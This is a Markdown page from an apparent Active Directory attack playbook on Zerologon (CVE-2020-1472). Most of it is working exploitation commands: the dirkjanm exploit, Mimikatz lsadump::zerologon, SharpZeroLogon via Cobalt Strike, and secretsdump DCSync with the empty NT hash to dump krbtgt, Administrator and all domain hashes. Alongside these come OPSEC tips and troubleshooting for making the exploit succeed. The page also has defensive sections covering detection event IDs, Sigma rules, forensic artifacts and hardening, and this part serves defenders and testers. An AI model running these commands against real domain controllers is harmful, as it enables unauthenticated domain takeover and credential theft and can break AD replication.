attack-40-zerologon-cve-2020-1472.md (22422B)
1 --- 2 title: "Attack #40 β Zerologon (CVE-2020-1472)" 3 description: "Zerologon is a critical vulnerability in the Netlogon Remote Protocol (MS-NRPC) that allows an unauthenticated attacker with network access to a DC to setβ¦" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #40 β Zerologon (CVE-2020-1472).md" 11 --- 12 # π΅ Attack #40 β Zerologon (CVE-2020-1472) 13 14 *** 15 16 ## π How It Works 17 18 Zerologon is a **critical vulnerability in the [Netlogon Remote Protocol (MS-NRPC)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/)** that allows an **unauthenticated attacker** with network access to a DC to **set the DC machine account password to empty** β effectively gaining Domain Admin access. The cryptographic flaw is in the AES-CFB8 initialization vector: by sending all-zero client challenges, there's a 1/256 chance the session key becomes all zeros, which the attacker can predict. 19 20 **CVSS Score: 10.0** β Full unauthenticated domain compromise. 21 22 > [!info]+ Technical Deep-Dive β AES-CFB8 Cryptographic Flaw 23 > 1. The [Netlogon protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/) uses **AES-CFB8** mode to compute a session key during the `NetrServerAuthenticate3` handshake between a client and a DC 24 > 2. In AES-CFB8, the **Initialization Vector (IV)** should be random β but the Netlogon implementation uses a **fixed all-zero IV** (`ComputeNetlogonCredential` function) 25 > 3. When the **client challenge** is also all zeros, the `ComputeNetlogonCredential` function produces an all-zero session credential with probability **1/256** (~0.39%) 26 > 4. The attacker sends up to 256 authentication attempts with all-zero challenges β statistically, one will succeed and produce an all-zero session key 27 > 5. With the known (all-zero) session key, the attacker calls `NetrServerPasswordSet2` to **set the DC machine account password to empty** 28 > 6. *The DC machine account (`DC01$`) is now set to an empty password, allowing the attacker to authenticate as the DC and perform DCSync (Attack #37)* 29 > 7. **Critical**: Setting the DC machine password to empty **breaks AD replication** and trust relationships β the password MUST be restored immediately after exploitation 30 31 > [!danger]+ Destructive Attack Warning 32 > `fas:Skull` 33 > 1. Zerologon **BREAKS the DC** if the machine password is not restored β AD replication, trust relationships, SYSVOL replication, and domain services will fail 34 > 2. This is a **"break glass" attack** β only use in time-constrained engagements with explicit authorization 35 > 3. **Always restore the DC machine password immediately after exploitation** 36 > 4. *In a real engagement, have the restore commands ready BEFORE running the exploit* 37 38 *** 39 40 ## βοΈ Prerequisites 41 42 | Requirement | Detail | 43 |---|---| 44 | **Network access to DC (port 135/445)** | No credentials required β fully unauthenticated | 45 | **DC is unpatched** | Patched in August 2020 ([KB4565349](https://support.microsoft.com/en-us/help/4565349)) | 46 | **DC hostname known** | Required for the NetBIOS name in the Netlogon handshake | 47 48 *** 49 50 ## π οΈ Tools 51 52 | Tool | Platform | Version | Notes | 53 |---|---|---|---| 54 | [zerologon_tester.py](https://github.com/SecuraBV/CVE-2020-1472) | Linux/Python | Python 3 | Secura's original vulnerability checker β safe, non-destructive | 55 | [cve-2020-1472-exploit.py](https://github.com/dirkjanm/CVE-2020-1472) | Linux/Python | Python 3 | dirkjanm's exploit β sets DC machine password to empty | 56 | [Mimikatz](https://github.com/gentilkiwi/mimikatz) | Windows | β₯ 2.2.0 (Sep 2020+) | `lsadump::zerologon` β Windows-native exploit | 57 | [SharpZeroLogon](https://github.com/nccgroup/nccfsas) | Windows (.NET) | Latest | C# exploit for C2 `execute-assembly` β NCC Group | 58 | [Impacket β secretsdump.py](https://github.com/fortra/impacket) | Linux | β₯ 0.9.22 | DCSync using the emptied DC machine account | 59 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β₯ 1.1.0 | `-M zerologon` vulnerability check module | 60 | [reinstall.py / restorepassword.py](https://github.com/dirkjanm/CVE-2020-1472) | Linux/Python | Python 3 | Restore the DC machine password after exploitation | 61 62 *** 63 64 ## β±οΈ Time-to-Execute Estimates 65 66 | Operation | Time | Notes | 67 |---|---|---| 68 | Vulnerability check | **5β30 seconds** | Up to 256 Netlogon attempts | 69 | Exploit (set password to empty) | **5β30 seconds** | Same 1/256 probability, ~2000 attempts max | 70 | DCSync with empty hash | **10β60 seconds** | Standard DCSync timing | 71 | Password restore | **5β15 seconds** | Critical β must be done immediately | 72 | **Total attack chain** | **30β120 seconds** | From unauthenticated β full domain compromise | 73 74 *** 75 76 ## π» Full Commands 77 78 ### π΅ Check Vulnerability 79 80 ```bash 81 # ββ zerologon_tester.py (safe β does NOT exploit) ββββββββββββββββββββββββββββ 82 python3 zerologon_tester.py DC01 10.10.10.10 83 # Output: "DC01 is VULNERABLE" or "not vulnerable" 84 85 # ββ NetExec module (also safe) ββββββββββββββββββββββββββββββββββββββββββββββββ 86 nxc smb DC01.corp.local -u '' -p '' -M zerologon 87 # Output: [+] VULNERABLE or [-] not vulnerable 88 ``` 89 90 ### π΄ Exploit β Set DC Password to Empty 91 92 ```bash 93 # ββ dirkjanm exploit (Linux) βββββββββββββββββββββββββββββββββββββββββββββββββ 94 python3 cve-2020-1472-exploit.py DC01 10.10.10.10 95 # Sets DC01$ machine account password to empty string 96 # β οΈ WARNING: This BREAKS the DC β restore password immediately after DCSync 97 98 # ββ DCSync with empty password ββββββββββββββββββββββββββββββββββββββββββββββββ 99 secretsdump.py -just-dc-user krbtgt corp.local/'DC01$'@DC01.corp.local \ 100 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 101 # 31d6cfe0d16ae931b73c59d7e0c089c0 = empty password NT hash 102 103 # ββ Dump all hashes βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 104 secretsdump.py corp.local/'DC01$'@DC01.corp.local \ 105 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc -outputfile zerologon_dump 106 107 # ββ Dump Administrator hash specifically (for next steps) βββββββββββββββββββββ 108 secretsdump.py corp.local/'DC01$'@DC01.corp.local \ 109 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 \ 110 -just-dc-user Administrator 111 ``` 112 113 #### Mimikatz (Windows) 114 115 ```powershell 116 # ββ Mimikatz zerologon exploit ββββββββββββββββββββββββββββββββββββββββββββββββ 117 privilege::debug 118 lsadump::zerologon /target:DC01.corp.local /account:DC01$ 119 # Exploits CVE-2020-1472 and sets machine password to empty 120 121 # ββ Then DCSync with the zeroed credentials βββββββββββββββββββββββββββββββββββ 122 lsadump::dcsync /domain:corp.local /dc:DC01.corp.local /user:krbtgt /authuser:DC01$ /authdomain:corp.local /authpassword:"" /authntlm 123 ``` 124 125 #### SharpZeroLogon (C# β for C2) 126 127 ```powershell 128 # ββ Via Cobalt Strike / Sliver ββββββββββββββββββββββββββββββββββββββββββββββββ 129 execute-assembly /path/to/SharpZeroLogon.exe DC01.corp.local 130 # Exploits and dumps the DC machine account hash 131 ``` 132 133 ### π΄ Restore DC Password (CRITICAL β Must Do) 134 135 ```bash 136 # ββ Step 1: Get the original DC machine password hash from the dump βββββββββββ 137 # Look for DC01$ in the zerologon_dump.ntds file: 138 # corp.local\DC01$:1001:aad3b435b51404eeaad3b435b51404ee:<ORIGINAL_HASH>::: 139 140 # ββ Step 2: Get Administrator hash for authentication βββββββββββββββββββββββββ 141 secretsdump.py corp.local/Administrator@DC01.corp.local \ 142 -hashes :<admin_NT_hash> -just-dc-user 'DC01$' 143 144 # ββ Step 3: Restore DC machine password βββββββββββββββββββββββββββββββββββββββ 145 python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.10 \ 146 -hexpass <original_hex_password> 147 148 # ββ Alternative: reinstall.py βββββββββββββββββββββββββββββββββββββββββββββββββ 149 python3 reinstall.py DC01 -target-ip 10.10.10.10 \ 150 -hexhash <original_dc_hash> 151 152 # ββ Verify restoration ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 153 # Try to authenticate as DC01$ with the original hash: 154 nxc smb DC01.corp.local -u 'DC01$' -H <original_dc_hash> 155 # Should succeed β password restored 156 157 # β οΈ WARNING: If DC password is not restored, AD replication will BREAK 158 # The DC will lose trust relationship with other DCs 159 ``` 160 161 > [!danger]+ Password Restoration is NOT Optional 162 > `fas:Skull` 163 > 1. Failing to restore the DC machine password will cause: **AD replication failure**, **trust relationship breakage**, **SYSVOL replication failure**, **Group Policy processing failure** 164 > 2. The restoration must happen **within minutes** β the longer you wait, the more damage occurs as other DCs try to replicate 165 > 3. If restoration fails, the only recovery option may be **restoring the DC from backup** 166 > 4. *Always have the restore commands prepared and tested BEFORE exploiting Zerologon* 167 168 *** 169 170 ## π― OPSEC Tips 171 172 1. **Zerologon BREAKS the DC** if password is not restored β replication, trust relationships, and services will fail 173 2. **This is a "break glass" attack** β only use if you're in a time-constrained engagement 174 3. **Patched since August 2020** β but legacy DCs may still be vulnerable 175 4. **Always restore the DC password after exploitation** 176 5. **The exploit generates ~256 failed authentication attempts** β these are logged as Event 5805 (Netlogon authentication failure) and are highly anomalous 177 6. **Execute and restore within 2β3 minutes** β minimize the window where the DC has an empty password 178 7. **Test the restore procedure first** on a lab environment β a failed restore in production is catastrophic 179 180 ### π OpSec Ranking 181 182 | Method | Stealth | Speed | Reliability | Notes | 183 |---|---|---|---|---| 184 | dirkjanm Python exploit | π΄ Low | π’ Fast | π’ High | 256 failed auth attempts are very noisy | 185 | Mimikatz zerologon | π΄ Low | π’ Fast | π’ High | Same noise + Mimikatz on disk | 186 | SharpZeroLogon | π΄ Low | π’ Fast | π‘ Medium | In-memory but still generates Netlogon noise | 187 188 > [!warning]+ Noise Profile 189 > `fas:TriangleExclamation` 190 > 1. Zerologon is **extremely noisy** β up to 2000 Netlogon authentication attempts in seconds 191 > 2. Any environment with basic Netlogon monitoring will detect this immediately 192 > 3. The attack is not stealthy and should only be used as a last resort or in time-constrained CTF/exam scenarios 193 > 4. *If stealth matters, prefer other escalation paths like Kerberoasting (Attack #2) or ACL abuse (Attack #65)* 194 195 *** 196 197 ## π‘οΈ Detection β Event IDs 198 199 | Event ID | Source | What to Look For | 200 |---|---|---| 201 | **4742** | Security Log (DC) | Computer account password change (DC01$ password set) | 202 | **5805** | System Log (DC) | Netlogon authentication failure (from exploit attempts β expect 100+ in seconds) | 203 | **4624** | Security Log (DC) | Logon with nullified DC credentials (Type 3 with DC01$ account) | 204 | **5829** | System Log (DC) | Vulnerable Netlogon secure channel connection allowed (post-patch, if enforcement not enabled) | 205 206 ### π Sigma Rules 207 208 ```yaml 209 # ββ SigmaHQ β Zerologon Exploitation Attempt βββββββββββββββββββββββββββββββββ 210 title: Zerologon (CVE-2020-1472) Exploitation Attempt 211 id: b1e5a3f0-7c52-4f3a-9e0a-3b4c5d6e7f8a 212 status: stable 213 logsource: 214 product: windows 215 service: system 216 detection: 217 selection: 218 EventID: 5805 219 timeframe: 1m 220 condition: selection | count() > 50 221 level: critical 222 tags: 223 - attack.privilege_escalation 224 - attack.t1210 225 - cve.2020.1472 226 ``` 227 228 ```yaml 229 # ββ SigmaHQ β DC Machine Account Password Change βββββββββββββββββββββββββββββ 230 title: DC Machine Account Password Reset (Zerologon Indicator) 231 id: a2b3c4d5-zerologon-dc-password-change 232 logsource: 233 product: windows 234 service: security 235 detection: 236 selection: 237 EventID: 4742 238 TargetUserName|endswith: '$' 239 keywords: 240 PasswordLastSet: '*' 241 condition: selection 242 level: high 243 ``` 244 245 ### π‘οΈ EDR-Specific Detections 246 247 > [!warning]+ Microsoft Defender for Identity (MDI) 248 > 1. **"Suspected Zerologon exploitation (CVE-2020-1472)"** β high-fidelity alert triggered by anomalous Netlogon authentication patterns 249 > 2. MDI detects the characteristic burst of failed Netlogon authentications followed by a successful authentication with an all-zero session key 250 > 3. **Immediate alert** β MDI classifies this as critical severity with automatic incident creation 251 252 > [!warning]+ CrowdStrike Falcon 253 > 1. **"Zerologon Exploitation Detected"** β network-level detection for MS-NRPC manipulation 254 > 2. Falcon correlates Netlogon RPC traffic patterns with CVE-2020-1472 signatures 255 > 3. Process tree analysis for exploit tools (Python scripts, SharpZeroLogon) 256 257 > [!warning]+ Elastic Security 258 > 1. Rule: **"Potential Zerologon Attack (CVE-2020-1472)"** β detects burst of Event 5805 entries 259 > 2. Rule: **"DC Machine Account Password Change"** β correlates Event 4742 with DC machine accounts 260 > 3. *Requires Windows Event Forwarding of System and Security logs from DCs* 261 262 *** 263 264 ## π¬ Forensic Artifacts 265 266 | Artifact | Location | Details | 267 |---|---|---| 268 | **Event 5805 burst** | DC System Log | 100β2000+ Netlogon authentication failures in a few seconds β pathognomonic for Zerologon | 269 | **Event 4742** | DC Security Log | DC machine account password change β timestamp marks exploitation | 270 | **Event 4624** | DC Security Log | Network logon with DC01$ using empty/zeroed credentials | 271 | **Event 5829** | DC System Log | Post-patch: vulnerable Netlogon connection allowed (if enforcement not enabled) | 272 | **Network capture** | PCAP | MS-NRPC `NetrServerAuthenticate3` calls with all-zero client challenges; `NetrServerPasswordSet2` call | 273 | **AD attribute** | `pwdLastSet` on DC$ account | Timestamp of password change β matches exploitation time | 274 275 *** 276 277 > [!important]+ Windows Server Version & Patch Timeline 278 > 1. **August 2020**: Initial patch released (KB4565349 for Server 2012 R2/2016/2019) β "Phase 1" allows vulnerable connections with Event 5829 warning 279 > 2. **February 2021**: "Phase 2" enforcement β DCs reject vulnerable Netlogon connections by default (registry `FullSecureChannelProtection = 1`) 280 > 3. **Server 2012 R2**: Vulnerable if unpatched; patch available but may not be installed on legacy systems 281 > 4. **Server 2016**: Vulnerable if unpatched; check `FullSecureChannelProtection` registry key 282 > 5. **Server 2019**: Vulnerable if unpatched; same patch timeline 283 > 6. **Server 2022**: Shipped with the fix included β NOT vulnerable out of the box 284 > 7. **Server 2025**: NOT vulnerable β Netlogon secure channel enforcement is default 285 > 8. *In practice, Zerologon is only exploitable on DCs that have been unpatched for 3+ years β but legacy environments still exist* 286 287 *** 288 289 ## π Hardening & Prevention 290 291 ```powershell 292 # ββ 1. Verify patch is installed ββββββββββββββββββββββββββββββββββββββββββββββ 293 Get-HotFix | Where-Object { $_.HotFixID -match 'KB4565349|KB4571694|KB4577015|KB4580325' } 294 # If empty, the DC is potentially vulnerable β patch immediately 295 296 # ββ 2. Enable enforcement mode (block vulnerable connections) βββββββββββββββββ 297 # Registry key (should be set after Feb 2021 update): 298 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" ` 299 -Name "FullSecureChannelProtection" -Value 1 -Type DWord 300 # Value 1 = enforce secure channel (reject vulnerable connections) 301 # Value 0 = allow vulnerable connections (NOT recommended) 302 303 # ββ 3. Monitor for vulnerable Netlogon connections (Event 5829) βββββββββββββββ 304 # After patching but before enforcement, monitor Event 5829: 305 # This event indicates a device connected using a vulnerable Netlogon secure channel 306 # Identify and update/patch these devices before enabling enforcement 307 308 # ββ 4. GPO β Deploy patch and enforcement domain-wide βββββββββββββββββββββββββ 309 # Computer Configuration β Policies β Admin Templates β System β Netlogon β 310 # β "Enforce use of secure RPC for Netlogon secure channel connections" = Enabled 311 312 # ββ 5. Monitor Netlogon authentication failures ββββββββββββββββββββββββββββββ 313 # Alert on Event 5805 burst: >50 events in 60 seconds = Zerologon attempt 314 # Configure SIEM alert: 315 # source=WinEventLog:System EventCode=5805 | timechart span=1m count | where count > 50 316 317 # ββ 6. Network-level mitigation ββββββββββββββββββββββββββββββββββββββββββββββ 318 # Block port 135/445 access to DCs from untrusted network segments 319 # Only allow domain-joined machines and admin workstations to reach DC RPC ports 320 321 # ββ 7. Upgrade legacy DCs ββββββββββββββββββββββββββββββββββββββββββββββββββββ 322 # Server 2008/2008 R2 reached end-of-life and DOES have a Zerologon patch, 323 # but upgrading to Server 2019+ is strongly recommended 324 ``` 325 326 *** 327 328 ## π§© Troubleshooting 329 330 | Error | Cause | Fix | 331 |---|---|---| 332 | `DC01 is NOT VULNERABLE` | DC is patched or enforcement mode is enabled | Verify patch status; check `FullSecureChannelProtection` registry; look for other attack paths | 333 | Exploit succeeds but DCSync fails | Empty password hash is wrong or DC has additional auth requirements | Use exact hash `31d6cfe0d16ae931b73c59d7e0c089c0` (empty NT hash); ensure you're using `DC01$` (with dollar sign) | 334 | `STATUS_ACCESS_DENIED` on secretsdump | Authentication issue after password reset | Verify you're authenticating as `DC01$` (machine account, not `DC01` user); use `-hashes :31d6cfe0...` syntax | 335 | Password restore fails | Original hex password not available or connection issues | Extract `DC01$` hash from the DCSync dump BEFORE restoring; if lost, may need DC restore from backup | 336 | AD replication broken after exploit | DC machine password was empty too long; trust relationships broken | Restore password immediately; if replication doesn't recover, run `repadmin /syncall /AeD`; worst case: demote and re-promote the DC | 337 | Exploit hangs / no response | Firewall blocking MS-NRPC traffic or wrong IP | Verify TCP 135/445 connectivity to DC; ensure target IP is the DC, not a load balancer | 338 | Multiple DCs in domain β which to target? | Need to target a specific DC | Choose the PDC Emulator (owns FSMO roles): `nxc smb DC01 -u '' -p '' -M zerologon`; or try each DC | 339 | Post-patch: Event 5829 appearing | Legacy devices using vulnerable Netlogon connections | Identify and update the device shown in Event 5829 before enabling enforcement mode | 340 341 *** 342 343 ## πΊοΈ MITRE ATT&CK 344 345 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 346 |---|---|---|---|---| 347 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Exploit CVE-2020-1472 to reset DC machine password and gain DA-equivalent access | [MERCURY/MuddyWater](https://attack.mitre.org/groups/G0069/), [DEV-0537 (LAPSUS$)](https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/) | 348 | **Lateral Movement** | [T1210](https://attack.mitre.org/techniques/T1210/) | Exploitation of Remote Services | Unauthenticated exploitation of MS-NRPC to compromise the Domain Controller | Iranian APT groups, ransomware operators | 349 | **Credential Access** | [T1003](https://attack.mitre.org/techniques/T1003/) | [.006 β DCSync](https://attack.mitre.org/techniques/T1003/006/) | After zeroing DC password, perform DCSync to extract all domain credentials | Chained technique | 350 351 > [!tip]+ Real-World APT Usage 352 > `fas:Lightbulb` 353 > 1. **MERCURY/MuddyWater (Iranian APT)** β Used Zerologon in 2020-2021 campaigns against government and telecom targets 354 > 2. **LAPSUS$ (DEV-0537)** β Leveraged Zerologon against legacy DCs in high-profile breaches of major tech companies 355 > 3. **Multiple ransomware groups** (Ryuk, Conti, LockBit) incorporated Zerologon into automated domain compromise playbooks β if DC is unpatched, exploit β DCSync β deploy ransomware 356 > 4. *CISA issued Emergency Directive 20-04 requiring all federal agencies to patch Zerologon within 4 days β an unprecedented urgency level* 357 358 *** 359 360 ## π Attack Chain Context 361 362 ``` 363 [Zerologon] βββ Unauthenticated Domain Compromise 364 β 365 ββββ π₯ CVE-2020-1472 β CVSS 10.0 366 ββββ π No creds needed β set DC password to null β DCSync (Attack #37) 367 ββββ π« DCSync KRBTGT β Golden Ticket (Attack #11) 368 ββββ π» DCSync Administrator β Pass-the-Hash (Attack #4) 369 ββββ β οΈ DESTRUCTIVE β must restore DC password immediately 370 ββββ π Compare: noPAC (Attack #44) β also low-priv β DA, but requires auth 371 ββββ π Defeated by: August 2020 patches, enforce secure channel signing 372 ``` 373 374 *** 375 376 > β **Attack #40 β Zerologon complete.**